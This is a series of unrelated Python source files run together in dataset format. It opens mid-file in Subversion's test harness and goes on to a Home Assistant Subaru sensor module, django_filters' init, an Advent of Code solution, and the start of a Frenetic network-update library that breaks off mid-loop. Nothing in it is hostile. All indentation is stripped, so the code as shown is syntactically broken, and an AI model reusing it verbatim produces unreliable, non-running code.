# them all.
for issue in self.pred.issues:
# Some safe starting assumptions.
milestone = 'unknown'
assigned_to = 'unknown'
if milestones_dict:
if milestones_dict.has_key(str(issue)):
milestone = milestones_dict[str(issue)][0]
assigned_to = milestones_dict[str(issue)][1]
filter_issues.append(
str(issue) + '(' + milestone + '/' + assigned_to + ')')
pattern = re.compile(options.milestone_filter)
if pattern.match(milestone):
matches_filter = True
# Did at least one of the associated issues meet our filter?
if matches_filter:
issues = filter_issues
# Wrap the issue#/target-milestone/assigned-to string
# to the next line and add a line break to enhance
# readability.
tail += "\n %s" % '\n '.join(
['#%s' % str(i) for i in issues])
tail += '\n'
# If there is no filter or this test made if through
# the filter then print it!
if options.milestone_filter is None or len(issues):
if self.pred.inprogress:
tail += " [[%s]]" % self.pred.inprogress
else:
print(" %3d %-5s %s%s" % (self.index,
self.pred.list_mode(),
self.pred.description,
tail))
sys.stdout.flush()
def get_mode(self):
return self.pred.list_mode()
def get_issues(self):
return self.pred.issues
def get_function_name(self):
return self.pred.get_function_name()
def _print_name(self, prefix):
if self.pred.inprogress:
print("%s %s %s: %s [[WIMP: %s]]" % (prefix,
os.path.basename(sys.argv[0]),
str(self.index),
self.pred.description,
self.pred.inprogress))
else:
print("%s %s %s: %s" % (prefix,
os.path.basename(sys.argv[0]),
str(self.index),
self.pred.description))
sys.stdout.flush()
def run(self):
"""Run self.pred and return the result. The return value is
- 0 if the test was successful
- 1 if it errored in a way that indicates test failure
- 2 if the test skipped
"""
sbox_name = self.pred.get_sandbox_name()
if sbox_name:
sandbox = svntest.sandbox.Sandbox(sbox_name, self.index)
else:
sandbox = None
# Explicitly set this so that commands that commit but don't supply a
# log message will fail rather than invoke an editor.
# Tests that want to use an editor should invoke svntest.main.use_editor.
os.environ['SVN_EDITOR'] = ''
os.environ['SVNTEST_EDITOR_FUNC'] = ''
if options.use_jsvn:
# Set this SVNKit specific variable to the current test (test name plus
# its index) being run so that SVNKit daemon could use this test name
# for its separate log file
os.environ['SVN_CURRENT_TEST'] = os.path.basename(sys.argv[0]) + "_" + \
str(self.index)
svntest.actions.no_sleep_for_timestamps()
svntest.actions.do_relocate_validation()
saved_dir = os.getcwd()
try:
rc = self.pred.run(sandbox)
if rc is not None:
self._print_name('STYLE ERROR in')
print('Test driver returned a status code.')
sys.exit(255)
result = svntest.testcase.RESULT_OK
except Skip, ex:
result = svntest.testcase.RESULT_SKIP
except Failure, ex:
result = svntest.testcase.RESULT_FAIL
msg = ''
# We captured Failure and its subclasses. We don't want to print
# anything for plain old Failure since that just indicates test
# failure, rather than relevant information. However, if there
# *is* information in the exception's arguments, then print it.
if ex.__class__ != Failure or ex.args:
ex_args = str(ex)
logger.warn('CWD: %s' % os.getcwd())
if ex_args:
msg = 'EXCEPTION: %s: %s' % (ex.__class__.__name__, ex_args)
else:
msg = 'EXCEPTION: %s' % ex.__class__.__name__
logger.warn(msg, exc_info=True)
except KeyboardInterrupt:
logger.error('Interrupted')
sys.exit(0)
except SystemExit, ex:
logger.error('EXCEPTION: SystemExit(%d), skipping cleanup' % ex.code)
self._print_name(ex.code and 'FAIL: ' or 'PASS: ')
raise
except:
result = svntest.testcase.RESULT_FAIL
logger.warn('CWD: %s' % os.getcwd(), exc_info=True)
os.chdir(saved_dir)
exit_code, result_text, result_benignity = self.pred.results(result)
if not (options.quiet and result_benignity):
self._print_name(result_text)
if sandbox is not None and exit_code != 1 and options.cleanup:
sandbox.cleanup_test_paths()
return exit_code
def is_httpd_authz_provider_enabled():
if is_ra_type_dav():
v = options.httpd_version.split('.')
return (v[0] == '2' and int(v[1]) >= 3) or int(v[0]) > 2
return None
######################################################################
# Main testing functions
# These two functions each take a TEST_LIST as input. The TEST_LIST
# should be a list of test functions; each test function should take
# no arguments and return a 0 on success, non-zero on failure.
# Ideally, each test should also have a short, one-line docstring (so
# it can be displayed by the 'list' command.)
# Func to run one test in the list.
def run_one_test(n, test_list, finished_tests = None):
"""Run the Nth client test in TEST_LIST, return the result.
If we're running the tests in parallel spawn the test in a new process.
"""
# allow N to be negative, so './basic_tests.py -- -1' works
num_tests = len(test_list) - 1
if (n == 0) or (abs(n) > num_tests):
print("There is no test %s.\n" % n)
return 1
if n < 0:
n += 1+num_tests
test_mode = TestRunner(test_list[n], n).get_mode().upper()
if options.mode_filter.upper() == 'ALL' \
or options.mode_filter.upper() == test_mode \
or (options.mode_filter.upper() == 'PASS' and test_mode == ''):
# Run the test.
exit_code = TestRunner(test_list[n], n).run()
return exit_code
else:
return 0
def _internal_run_tests(test_list, testnums, parallel, srcdir, progress_func):
"""Run the tests from TEST_LIST whose indices are listed in TESTNUMS.
If we're running the tests in parallel spawn as much parallel processes
as requested and gather the results in a temp. buffer when a child
process is finished.
"""
exit_code = 0
finished_tests = []
tests_started = 0
# Some of the tests use sys.argv[0] to locate their test data
# directory. Perhaps we should just be passing srcdir to the tests?
if srcdir:
sys.argv[0] = os.path.join(srcdir, 'subversion', 'tests', 'cmdline',
sys.argv[0])
if not parallel:
for i, testnum in enumerate(testnums):
if run_one_test(testnum, test_list) == 1:
exit_code = 1
# signal progress
if progress_func:
progress_func(i+1, len(testnums))
else:
number_queue = queue.Queue()
for num in testnums:
number_queue.put(num)
threads = [ TestSpawningThread(number_queue, progress_func,
len(testnums)) for i in range(parallel) ]
for t in threads:
t.start()
for t in threads:
t.join()
# list of (index, result, stdout, stderr)
results = []
for t in threads:
results += t.results
results.sort()
# all tests are finished, find out the result and print the logs.
for (index, result, stdout_lines, stderr_lines) in results:
if stdout_lines:
for line in stdout_lines:
sys.stdout.write(line)
if stderr_lines:
for line in stderr_lines:
sys.stdout.write(line)
if result == 1:
exit_code = 1
svntest.sandbox.cleanup_deferred_test_paths()
return exit_code
def create_default_options():
"""Set the global options to the defaults, as provided by the argument
parser."""
_parse_options([])
def _create_parser():
"""Return a parser for our test suite."""
def set_log_level(option, opt, value, parser, level=None):
if level:
# called from --verbose
logger.setLevel(level)
else:
# called from --set-log-level
logger.setLevel(getattr(logging, value, None) or int(value))
# set up the parser
_default_http_library = 'serf'
usage = 'usage: %prog [options] [<test> ...]'
parser = optparse.OptionParser(usage=usage)
parser.add_option('-l', '--list', action='store_true', dest='list_tests',
help='Print test doc strings instead of running them')
parser.add_option('--milestone-filter', action='store', dest='milestone_filter',
help='Limit --list to those with target milestone specified')
parser.add_option('-v', '--verbose', action='callback',
callback=set_log_level, callback_args=(logging.DEBUG, ),
help='Print binary command-lines (same as ' +
'"--set-log-level logging.DEBUG")')
parser.add_option('-q', '--quiet', action='store_true',
help='Print only unexpected results (not with --verbose)')
parser.add_option('-p', '--parallel', action='store_const',
const=default_num_threads, dest='parallel',
help='Run the tests in parallel')
parser.add_option('-c', action='store_true', dest='is_child_process',
help='Flag if we are running this python test as a ' +
'child process')
parser.add_option('--mode-filter', action='store', dest='mode_filter',
default='ALL',
help='Limit tests to those with type specified (e.g. XFAIL)')
parser.add_option('--url', action='store',
help='Base url to the repos (e.g. svn://localhost)')
parser.add_option('--fs-type', action='store',
help='Subversion file system type (fsfs or bdb)')
parser.add_option('--cleanup', action='store_true',
help='Whether to clean up')
parser.add_option('--enable-sasl', action='store_true',
help='Whether to enable SASL authentication')
parser.add_option('--bin', action='store', dest='svn_bin',
help='Use the svn binaries installed in this path')
parser.add_option('--use-jsvn', action='store_true',
help="Use the jsvn (SVNKit based) binaries. Can be " +
"combined with --bin to point to a specific path")
parser.add_option('--http-library', action='store',
help="Make svn use this DAV library (neon or serf) if " +
"it supports both, else assume it's using this " +
"one; the default is " + _default_http_library)
parser.add_option('--server-minor-version', type='int', action='store',
help="Set the minor version for the server ('3'..'%d')."
% SVN_VER_MINOR)
parser.add_option('--fsfs-packing', action='store_true',
help="Run 'svnadmin pack' automatically")
parser.add_option('--fsfs-sharding', action='store', type='int',
help='Default shard size (for fsfs)')
parser.add_option('--config-file', action='store',
help="Configuration file for tests.")
parser.add_option('--set-log-level', action='callback', type='str',
callback=set_log_level,
help="Set log level (numerically or symbolically). " +
"Symbolic levels are: CRITICAL, ERROR, WARNING, " +
"INFO, DEBUG")
parser.add_option('--log-with-timestamps', action='store_true',
help="Show timestamps in test log.")
parser.add_option('--keep-local-tmp', action='store_true',
help="Don't remove svn-test-work/local_tmp after test " +
"run is complete. Useful for debugging failures.")
parser.add_option('--development', action='store_true',
help='Test development mode: provides more detailed ' +
'test output and ignores all exceptions in the ' +
'run_and_verify* functions. This option is only ' +
'useful during test development!')
parser.add_option('--srcdir', action='store', dest='srcdir',
help='Source directory.')
parser.add_option('--ssl-cert', action='store',
help='Path to SSL server certificate.')
parser.add_option('--http-proxy', action='store',
help='Use the HTTP Proxy at hostname:port.')
parser.add_option('--httpd-version', action='store',
help='Assume HTTPD is this version.')
parser.add_option('--tools-bin', action='store', dest='tools_bin',
help='Use the svn tools installed in this path')
# most of the defaults are None, but some are other values, set them here
parser.set_defaults(
server_minor_version=SVN_VER_MINOR,
url=file_scheme_prefix + \
urllib.pathname2url(os.path.abspath(os.getcwd())),
http_library=_default_http_library)
return parser
def _parse_options(arglist=sys.argv[1:]):
"""Parse the arguments in arg_list, and set the global options object with
the results"""
global options
parser = _create_parser()
(options, args) = parser.parse_args(arglist)
# some sanity checking
if options.fsfs_packing and not options.fsfs_sharding:
parser.error("--fsfs-packing requires --fsfs-sharding")
# If you change the below condition then change
# ../../../../build/run_tests.py too.
if options.server_minor_version not in range(3, SVN_VER_MINOR+1):
parser.error("test harness only supports server minor versions 3-%d"
% SVN_VER_MINOR)
if options.url:
if options.url[-1:] == '/': # Normalize url to have no trailing slash
options.test_area_url = options.url[:-1]
else:
options.test_area_url = options.url
return (parser, args)
def run_tests(test_list, serial_only = False):
"""Main routine to run all tests in TEST_LIST.
NOTE: this function does not return. It does a sys.exit() with the
appropriate exit code.
"""
sys.exit(execute_tests(test_list, serial_only))
def get_issue_details(issue_numbers):
"""For each issue number in ISSUE_NUMBERS query the issue
tracker and determine what the target milestone is and
who the issue is assigned to. Return this information
as a dictionary mapping issue numbers to a list
[target_milestone, assigned_to]"""
xml_url = "http://subversion.tigris.org/issues/xml.cgi?id="
issue_dict = {}
if isinstance(issue_numbers, int):
issue_numbers = [str(issue_numbers)]
elif isinstance(issue_numbers, str):
issue_numbers = [issue_numbers]
if issue_numbers is None or len(issue_numbers) == 0:
return issue_dict
for num in issue_numbers:
xml_url += str(num) + ','
issue_dict[str(num)] = 'unknown'
try:
# Parse the xml for ISSUE_NO from the issue tracker into a Document.
issue_xml_f = urllib.urlopen(xml_url)
except:
print "WARNING: Unable to contact issue tracker; " \
"milestones defaulting to 'unknown'."
return issue_dict
try:
xmldoc = xml.dom.minidom.parse(issue_xml_f)
issue_xml_f.close()
# For each issue: Get the target milestone and who
# the issue is assigned to.
issue_element = xmldoc.getElementsByTagName('issue')
for i in issue_element:
issue_id_element = i.getElementsByTagName('issue_id')
issue_id = issue_id_element[0].childNodes[0].nodeValue
milestone_element = i.getElementsByTagName('target_milestone')
milestone = milestone_element[0].childNodes[0].nodeValue
assignment_element = i.getElementsByTagName('assigned_to')
assignment = assignment_element[0].childNodes[0].nodeValue
issue_dict[issue_id] = [milestone, assignment]
except:
print "ERROR: Unable to parse target milestones from issue tracker"
raise
return issue_dict
class AbbreviatedFormatter(logging.Formatter):
"""A formatter with abbreviated loglevel indicators in the output.
Use %(levelshort)s in the format string to get a single character
representing the loglevel..
"""
_level_short = {
logging.CRITICAL : 'C',
logging.ERROR : 'E',
logging.WARNING : 'W',
logging.INFO : 'I',
logging.DEBUG : 'D',
logging.NOTSET : '-',
}
def format(self, record):
record.levelshort = self._level_short[record.levelno]
return logging.Formatter.format(self, record)
# Main func. This is the "entry point" that all the test scripts call
# to run their list of tests.
#
# This routine parses sys.argv to decide what to do.
def execute_tests(test_list, serial_only = False, test_name = None,
progress_func = None, test_selection = []):
"""Similar to run_tests(), but just returns the exit code, rather than
exiting the process. This function can be used when a caller doesn't
want the process to die."""
global logger
global pristine_url
global pristine_greek_repos_url
global svn_binary
global svnadmin_binary
global svnlook_binary
global svnsync_binary
global svndumpfilter_binary
global svnversion_binary
global svnmucc_binary
global svnauthz_binary
global svnauthz_validate_binary
global options
if test_name:
sys.argv[0] = test_name
testnums = []
# Initialize the LOGGER global variable so the option parsing can set
# its loglevel, as appropriate.
logger = logging.getLogger()
# Did some chucklehead log something before we configured it? If they
# did, then a default handler/formatter would get installed. We want
# to be the one to install the first (and only) handler.
for handler in logger.handlers:
if not isinstance(handler.formatter, AbbreviatedFormatter):
raise Exception('Logging occurred before configuration. Some code'
' path needs to be fixed. Examine the log output'
' to find what/where logged something.')
if not options:
# Override which tests to run from the commandline
(parser, args) = _parse_options()
test_selection = args
else:
parser = _create_parser()
# If there are no handlers registered yet, then install our own with
# our custom formatter. (anything currently installed *is* our handler
# as tested above)
if not logger.handlers:
# Now that we have some options, let's get the logger configured before
# doing anything more
if options.log_with_timestamps:
formatter = AbbreviatedFormatter('%(levelshort)s:'
' [%(asctime)s] %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
else:
formatter = AbbreviatedFormatter('%(levelshort)s: %(message)s')
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(formatter)
logger.addHandler(handler)
# parse the positional arguments (test nums, names)
for arg in test_selection:
appended = False
try:
testnums.append(int(arg))
appended = True
except ValueError:
# Do nothing for now.
appended = False
if not appended:
try:
# Check if the argument is a range
numberstrings = arg.split(':');
if len(numberstrings) != 2:
numberstrings = arg.split('-');
if len(numberstrings) != 2:
raise ValueError
left = int(numberstrings[0])
right = int(numberstrings[1])
if left > right:
raise ValueError
for nr in range(left,right+1):
testnums.append(nr)
else:
appended = True
except ValueError:
appended = False
if not appended:
try:
# Check if the argument is a function name, and translate
# it to a number if possible
for testnum in list(range(1, len(test_list))):
test_case = TestRunner(test_list[testnum], testnum)
if test_case.get_function_name() == str(arg):
testnums.append(testnum)
appended = True
break
except ValueError:
appended = False
if not appended:
parser.error("invalid test number, range of numbers, " +
"or function '%s'\n" % arg)
# Calculate pristine_greek_repos_url from test_area_url.
pristine_greek_repos_url = options.test_area_url + '/' + \
urllib.pathname2url(pristine_greek_repos_dir)
if options.use_jsvn:
if options.svn_bin is None:
options.svn_bin = ''
svn_binary = os.path.join(options.svn_bin, 'jsvn' + _bat)
svnadmin_binary = os.path.join(options.svn_bin, 'jsvnadmin' + _bat)
svnlook_binary = os.path.join(options.svn_bin, 'jsvnlook' + _bat)
svnsync_binary = os.path.join(options.svn_bin, 'jsvnsync' + _bat)
svndumpfilter_binary = os.path.join(options.svn_bin,
'jsvndumpfilter' + _bat)
svnversion_binary = os.path.join(options.svn_bin,
'jsvnversion' + _bat)
svnmucc_binary = os.path.join(options.svn_bin, 'jsvnmucc' + _bat)
else:
if options.svn_bin:
svn_binary = os.path.join(options.svn_bin, 'svn' + _exe)
svnadmin_binary = os.path.join(options.svn_bin, 'svnadmin' + _exe)
svnlook_binary = os.path.join(options.svn_bin, 'svnlook' + _exe)
svnsync_binary = os.path.join(options.svn_bin, 'svnsync' + _exe)
svndumpfilter_binary = os.path.join(options.svn_bin,
'svndumpfilter' + _exe)
svnversion_binary = os.path.join(options.svn_bin, 'svnversion' + _exe)
svnmucc_binary = os.path.join(options.svn_bin, 'svnmucc' + _exe)
if options.tools_bin:
svnauthz_binary = os.path.join(options.tools_bin, 'svnauthz' + _exe)
svnauthz_validate_binary = os.path.join(options.tools_bin,
'svnauthz-validate' + _exe)
######################################################################
# Cleanup: if a previous run crashed or interrupted the python
# interpreter, then `temp_dir' was never removed. This can cause wonkiness.
if not options.is_child_process:
safe_rmtree(temp_dir, 1)
if not testnums:
# If no test numbers were listed explicitly, include all of them:
testnums = list(range(1, len(test_list)))
if options.list_tests:
# If we want to list the target milestones, then get all the issues
# associated with all the individual tests.
milestones_dict = None
if options.milestone_filter:
issues_dict = {}
for testnum in testnums:
issues = TestRunner(test_list[testnum], testnum).get_issues()
test_mode = TestRunner(test_list[testnum], testnum).get_mode().upper()
if issues:
for issue in issues:
if (options.mode_filter.upper() == 'ALL' or
options.mode_filter.upper() == test_mode or
(options.mode_filter.upper() == 'PASS' and test_mode == '')):
issues_dict[issue]=issue
milestones_dict = get_issue_details(issues_dict.keys())
header = "Test # Mode Test Description\n"
if options.milestone_filter:
header += " Issue#(Target Mileston/Assigned To)\n"
header += "------ ----- ----------------"
printed_header = False
for testnum in testnums:
test_mode = TestRunner(test_list[testnum], testnum).get_mode().upper()
if options.mode_filter.upper() == 'ALL' \
or options.mode_filter.upper() == test_mode \
or (options.mode_filter.upper() == 'PASS' and test_mode == ''):
if not printed_header:
print header
printed_header = True
TestRunner(test_list[testnum], testnum).list(milestones_dict)
# We are simply listing the tests so always exit with success.
return 0
# don't run tests in parallel when the tests don't support it or there
# are only a few tests to run.
if serial_only or len(testnums) < 2:
options.parallel = 0
if not options.is_child_process:
# Build out the default configuration directory
create_config_dir(default_config_dir,
ssl_cert=options.ssl_cert,
ssl_url=options.test_area_url,
http_proxy=options.http_proxy)
# Setup the pristine repository
svntest.actions.setup_pristine_greek_repository()
# Run the tests.
exit_code = _internal_run_tests(test_list, testnums, options.parallel,
options.srcdir, progress_func)
# Remove all scratchwork: the 'pristine' repository, greek tree, etc.
# This ensures that an 'import' will happen the next time we run.
if not options.is_child_process and not options.keep_local_tmp:
safe_rmtree(temp_dir, 1)
# Cleanup after ourselves.
svntest.sandbox.cleanup_deferred_test_paths()
# Return the appropriate exit code from the tests.
return exit_code
| centic9/subversion-ppa | subversion/tests/cmdline/svntest/main.py | Python | apache-2.0 | 78,919 | 0.01219 |
"""Support for Subaru sensors."""
import subarulink.const as sc
from homeassistant.components.sensor import DEVICE_CLASSES
from homeassistant.const import (
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_TEMPERATURE,
DEVICE_CLASS_VOLTAGE,
LENGTH_KILOMETERS,
LENGTH_MILES,
PERCENTAGE,
PRESSURE_HPA,
TEMP_CELSIUS,
TIME_MINUTES,
VOLT,
VOLUME_GALLONS,
VOLUME_LITERS,
)
from homeassistant.util.distance import convert as dist_convert
from homeassistant.util.unit_system import (
IMPERIAL_SYSTEM,
LENGTH_UNITS,
PRESSURE_UNITS,
TEMPERATURE_UNITS,
)
from homeassistant.util.volume import convert as vol_convert
from .const import (
API_GEN_2,
DOMAIN,
ENTRY_COORDINATOR,
ENTRY_VEHICLES,
VEHICLE_API_GEN,
VEHICLE_HAS_EV,
VEHICLE_HAS_SAFETY_SERVICE,
VEHICLE_STATUS,
)
from .entity import SubaruEntity
L_PER_GAL = vol_convert(1, VOLUME_GALLONS, VOLUME_LITERS)
KM_PER_MI = dist_convert(1, LENGTH_MILES, LENGTH_KILOMETERS)
# Fuel Economy Constants
FUEL_CONSUMPTION_L_PER_100KM = "L/100km"
FUEL_CONSUMPTION_MPG = "mi/gal"
FUEL_CONSUMPTION_UNITS = [FUEL_CONSUMPTION_L_PER_100KM, FUEL_CONSUMPTION_MPG]
SENSOR_TYPE = "type"
SENSOR_CLASS = "class"
SENSOR_FIELD = "field"
SENSOR_UNITS = "units"
# Sensor data available to "Subaru Safety Plus" subscribers with Gen1 or Gen2 vehicles
SAFETY_SENSORS = [
{
SENSOR_TYPE: "Odometer",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.ODOMETER,
SENSOR_UNITS: LENGTH_KILOMETERS,
},
]
# Sensor data available to "Subaru Safety Plus" subscribers with Gen2 vehicles
API_GEN_2_SENSORS = [
{
SENSOR_TYPE: "Avg Fuel Consumption",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.AVG_FUEL_CONSUMPTION,
SENSOR_UNITS: FUEL_CONSUMPTION_L_PER_100KM,
},
{
SENSOR_TYPE: "Range",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.DIST_TO_EMPTY,
SENSOR_UNITS: LENGTH_KILOMETERS,
},
{
SENSOR_TYPE: "Tire Pressure FL",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_FL,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "Tire Pressure FR",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_FR,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "Tire Pressure RL",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_RL,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "Tire Pressure RR",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.TIRE_PRESSURE_RR,
SENSOR_UNITS: PRESSURE_HPA,
},
{
SENSOR_TYPE: "External Temp",
SENSOR_CLASS: DEVICE_CLASS_TEMPERATURE,
SENSOR_FIELD: sc.EXTERNAL_TEMP,
SENSOR_UNITS: TEMP_CELSIUS,
},
{
SENSOR_TYPE: "12V Battery Voltage",
SENSOR_CLASS: DEVICE_CLASS_VOLTAGE,
SENSOR_FIELD: sc.BATTERY_VOLTAGE,
SENSOR_UNITS: VOLT,
},
]
# Sensor data available to "Subaru Safety Plus" subscribers with PHEV vehicles
EV_SENSORS = [
{
SENSOR_TYPE: "EV Range",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.EV_DISTANCE_TO_EMPTY,
SENSOR_UNITS: LENGTH_MILES,
},
{
SENSOR_TYPE: "EV Battery Level",
SENSOR_CLASS: DEVICE_CLASS_BATTERY,
SENSOR_FIELD: sc.EV_STATE_OF_CHARGE_PERCENT,
SENSOR_UNITS: PERCENTAGE,
},
{
SENSOR_TYPE: "EV Time to Full Charge",
SENSOR_CLASS: None,
SENSOR_FIELD: sc.EV_TIME_TO_FULLY_CHARGED,
SENSOR_UNITS: TIME_MINUTES,
},
]
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Subaru sensors by config_entry."""
coordinator = hass.data[DOMAIN][config_entry.entry_id][ENTRY_COORDINATOR]
vehicle_info = hass.data[DOMAIN][config_entry.entry_id][ENTRY_VEHICLES]
entities = []
for vin in vehicle_info.keys():
entities.extend(create_vehicle_sensors(vehicle_info[vin], coordinator))
async_add_entities(entities, True)
def create_vehicle_sensors(vehicle_info, coordinator):
"""Instantiate all available sensors for the vehicle."""
sensors_to_add = []
if vehicle_info[VEHICLE_HAS_SAFETY_SERVICE]:
sensors_to_add.extend(SAFETY_SENSORS)
if vehicle_info[VEHICLE_API_GEN] == API_GEN_2:
sensors_to_add.extend(API_GEN_2_SENSORS)
if vehicle_info[VEHICLE_HAS_EV]:
sensors_to_add.extend(EV_SENSORS)
return [
SubaruSensor(
vehicle_info,
coordinator,
s[SENSOR_TYPE],
s[SENSOR_CLASS],
s[SENSOR_FIELD],
s[SENSOR_UNITS],
)
for s in sensors_to_add
]
class SubaruSensor(SubaruEntity):
"""Class for Subaru sensors."""
def __init__(
self, vehicle_info, coordinator, entity_type, sensor_class, data_field, api_unit
):
"""Initialize the sensor."""
super().__init__(vehicle_info, coordinator)
self.hass_type = "sensor"
self.current_value = None
self.entity_type = entity_type
self.sensor_class = sensor_class
self.data_field = data_field
self.api_unit = api_unit
@property
def device_class(self):
"""Return the class of this device, from component DEVICE_CLASSES."""
if self.sensor_class in DEVICE_CLASSES:
return self.sensor_class
return super().device_class
@property
def state(self):
"""Return the state of the sensor."""
self.current_value = self.get_current_value()
if self.current_value is None:
return None
if self.api_unit in TEMPERATURE_UNITS:
return round(
self.hass.config.units.temperature(self.current_value, self.api_unit), 1
)
if self.api_unit in LENGTH_UNITS:
return round(
self.hass.config.units.length(self.current_value, self.api_unit), 1
)
if self.api_unit in PRESSURE_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return round(
self.hass.config.units.pressure(self.current_value, self.api_unit),
1,
)
if self.api_unit in FUEL_CONSUMPTION_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return round((100.0 * L_PER_GAL) / (KM_PER_MI * self.current_value), 1)
return self.current_value
@property
def unit_of_measurement(self):
"""Return the unit_of_measurement of the device."""
if self.api_unit in TEMPERATURE_UNITS:
return self.hass.config.units.temperature_unit
if self.api_unit in LENGTH_UNITS:
return self.hass.config.units.length_unit
if self.api_unit in PRESSURE_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return self.hass.config.units.pressure_unit
return PRESSURE_HPA
if self.api_unit in FUEL_CONSUMPTION_UNITS:
if self.hass.config.units == IMPERIAL_SYSTEM:
return FUEL_CONSUMPTION_MPG
return FUEL_CONSUMPTION_L_PER_100KM
return self.api_unit
@property
def available(self):
"""Return if entity is available."""
last_update_success = super().available
if last_update_success and self.vin not in self.coordinator.data:
return False
return last_update_success
def get_current_value(self):
"""Get raw value from the coordinator."""
value = self.coordinator.data[self.vin][VEHICLE_STATUS].get(self.data_field)
if value in sc.BAD_SENSOR_VALUES:
value = None
if isinstance(value, str):
if "." in value:
value = float(value)
else:
value = int(value)
return value
| partofthething/home-assistant | homeassistant/components/subaru/sensor.py | Python | apache-2.0 | 7,898 | 0.000886 |
# flake8: noqa
from __future__ import absolute_import
from .filterset import FilterSet
from .filters import *
__version__ = '0.9.2'
def parse_version(version):
'''
'0.1.2-dev' -> (0, 1, 2, 'dev')
'0.1.2' -> (0, 1, 2)
'''
v = version.split('.')
v = v[:-1] + v[-1].split('-')
ret = []
for p in v:
if p.isdigit():
ret.append(int(p))
else:
ret.append(p)
return tuple(ret)
VERSION = parse_version(__version__)
| andela-bojengwa/talk | venv/lib/python2.7/site-packages/django_filters/__init__.py | Python | mit | 485 | 0.002062 |
import re
with open('d07.txt') as f:
raw_input = f.readlines()
test_input = """abba[mnop]qrst
abcd[bddb]xyyx
aaaa[qwer]tyui
ioxxoj[asdfgh]zxcvbn
asdfasdf[qwerqwer]asdffdsa[12341234]zcxvzcv""".splitlines()
def group_finder(s):
head, _, tail = s.partition('[')
yield head
if tail:
yield from group_finder(tail)
re_abba = re.compile(r'.*([a-z])(?!\1)([a-z])\2\1')
total = 0
for line in raw_input:
line_groups = list(group_finder(line.replace(']', '[')))
ips = line_groups[::2]
hns = line_groups[1::2]
if any(re_abba.match(ip) for ip in ips) and not any(re_abba.match(hn) for hn in hns):
total += 1
print(total)
# part 2!
test_input = """aba[bab]xyz
xyx[xyx]xyx
aaa[kek]eke
zazbz[bzb]cdb""".splitlines()
import regex
re_aba = regex.compile(r'([a-z])(?!\1)([a-z])\1')
total = 0
for line in raw_input:
line_groups = list(group_finder(line.replace(']', '[')))
ips = line_groups[::2]
hns = line_groups[1::2]
match = False
for ip in ips:
for a, b in re_aba.findall(ip, overlapped=True):
if any(b + a + b in hn for hn in hns):
match = True
if match:
total += 1
print(total)
| sclarke/adventofcode2016 | d07.py | Python | bsd-3-clause | 1,196 | 0.001672 |
################################################################################
# The Frenetic Project #
# frenetic@frenetic-lang.org #
################################################################################
# Licensed to the Frenetic Project by one or more contributors. See the #
# NOTICE file distributed with this work for additional information #
# regarding copyright and ownership. The Frenetic Project licenses this #
# file to you under the following license. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided the following conditions are met: #
# - Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# - Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in #
# the documentation or other materials provided with the distribution. #
# - The names of the copyright holds and contributors may not be used to #
# endorse or promote products derived from this work without specific #
# prior written permission. #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT #
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the #
# LICENSE file distributed with this work for specific language governing #
# permissions and limitations under the License. #
################################################################################
# /updates/update_lib.py #
# Update Library Functions #
################################################################################
from collections import defaultdict
import sys, os
from time import time
sys.path.append(os.environ['NOX_CORE_DIR'])
from nox.lib.core import UINT32_MAX, openflow
from policy import *
import logging
from decimal import Decimal
import networkx as nx
from update import UpdateObject
log = logging.getLogger("frenetic.update.update_lib")
#############
# CONSTANTS #
#############
# maximum priority of OpenFlow rules
MAX_PRIORITY = 0xffff
####################
# GLOBAL VARIABLES #
####################
# inst
# * reference to currently running NOX component
# * also stores run-time structures used during updates
# - current_version: policy version
# - current_priority: OpenFlow priority level
# - current_internal_policy: policy for versioned traffic
# - current_edge_policy: policy for unversioned traffic
# - active_flows: dictionary of active flows, used for per-flow updates
# - current_abstract_policy: unversioned policy equivalent to current
# - future_abstract_policy: unversioned policy we're updating to
# - concrete_policy: maps abstract rules to installed versioned rules
# - installed_priority: FIXME
# - stats: statistics
inst = None
experiment = False
DEBUG = True
def setup(_inst, _experiment):
"""
_inst: reference to current NOX component
sets inst to _inst and initializes run-time structures
"""
global inst
global experiment
inst = _inst
experiment = _experiment
inst.current_version = 0
inst.current_priority = MAX_PRIORITY
inst.current_internal_policy = NetworkPolicy()
inst.current_edge_policy = NetworkPolicy()
inst.active_flows = {}
inst.current_abstract_policy = NetworkPolicy()
inst.future_abstract_policy = NetworkPolicy()
inst.stats = UpdateStats()
inst.concrete_policy = defaultdict(lambda:defaultdict(lambda:[]))
inst.installed_priority = \
defaultdict(lambda:defaultdict(lambda:MAX_PRIORITY))
return
##############
# STATISTICS #
##############
# UpdateStats
class UpdateStats:
"""
Class whose objects represent statistics about the number of
policy updates, rule adds, and rule deletes.
"""
def __init__(self):
self.updates = 0
self.start_time = time()
self.installs = defaultdict(lambda:0)
self.modifies = defaultdict(lambda:0)
self.deletes = defaultdict(lambda:0)
self.current_rules = defaultdict(lambda:0)
self.current_abstract_rules = defaultdict(lambda:0)
self.future_abstract_rules = defaultdict(lambda:0)
self.max_overhead = defaultdict(lambda:0)
def tally_update(self, policy):
self.updates += 1
self.current_abstract_rules = self.future_abstract_rules
self.future_abstract_rules = {}
for switch, config in policy:
